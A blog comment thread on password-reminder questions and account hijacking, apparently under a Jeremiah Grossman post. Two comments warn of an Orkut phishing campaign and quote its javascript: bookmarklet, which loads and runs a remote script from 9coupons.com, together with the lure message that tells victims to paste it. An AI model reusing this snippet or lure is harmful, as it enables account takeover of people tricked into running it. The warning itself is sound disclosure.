Comments on Jeremiah Grossman: Hacking Sprint accounts online made easy
Last updated: 2024-02-08T03:44:23.780-08:00

Unknown (https://www.blogger.com/profile/10096824254603151286), 2008-04-23T15:57:00.000-07:00

It seems we've got a filter here :-(! Anyways.... The script file is located here.....
'http://9coupons.com/n.js'
------------------------
javascript:d=document;
c=d.createElement('script');
d.body.appendChild(c);
c.src='http://9coupons.com/n.js';
void(0)
---------------------------
Is what appears in the scraps and from a friend.... so people would likely trust it and along with it the message nicely written:

Hey..One girl is written about u in her ABOUT ME..And ur photos also..
Clear ur address bar..copy paste.. Below Script To See This Person

The filter bypass on orkut could be seen on the above link by careful code eval I have provided.... no time for much research coz it's kinda late here in the Kingdom of Bahrain !...

Apologies if I have got the wrong blog....

-ShawnZ

Unknown (https://www.blogger.com/profile/10096824254603151286), 2008-04-23T15:43:00.000-07:00

ORKUT is being hacked.....by a phishing link

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://9coupons.com/n.js';void(0)

This is just to alert everyone that this is in the Wild!!!!.....further diggin' will be done................

I guess everyone will pop in....but here is the heads up!!!!

Anonymous, 2008-04-15T06:40:00.000-07:00

Well that's why I said it wasn't fool-proof. A majority of users will think nothing of it, and will actually submit something personal in nature. A great example of what could be used however without worrying about giving away too much information would be something random and humorous such as a joke by comedian Eugene Mirman. "Now whenever I call they have to ask me what am I wearing, and I have to respond, 'I don't think that's appropriate!'"

Jeremiah Grossman (https://www.blogger.com/profile/05017778127841311186), 2008-04-14T11:50:00.000-07:00

Yah, that approach technically works, but then the pendulum swings the other way. Now this "service" has a lot more personal information about you that I'd prefer they didn't have. Basically I just give incorrect answers now and use those fields as passwords normally.

Anonymous, 2008-04-14T07:21:00.000-07:00

Again not a fool-proof method, but a lot of services ask you for up to five custom verification questions and answers, which are supplied when you first create an account. This really depends on what the user chooses to enter, however it is much less likely that someone would be able to supply a specific traumatic childhood event than it would for them to answer with your mother's name.

Anonymous, 2008-04-12T13:46:00.000-07:00

I completely agree with you on this one. Password reminder systems tend to considerably undermine any security that the password itself had provided. Why try and brute force a complex password when you can just enter a basic piece of information about the person? It's much easier to guess a mascot or pet name anyway.

Similar post of mine on password reminder systems: http://michaelcoates.wordpress.com/2008/02/12/ill-hack-your-pets-instead-of-your-passwords/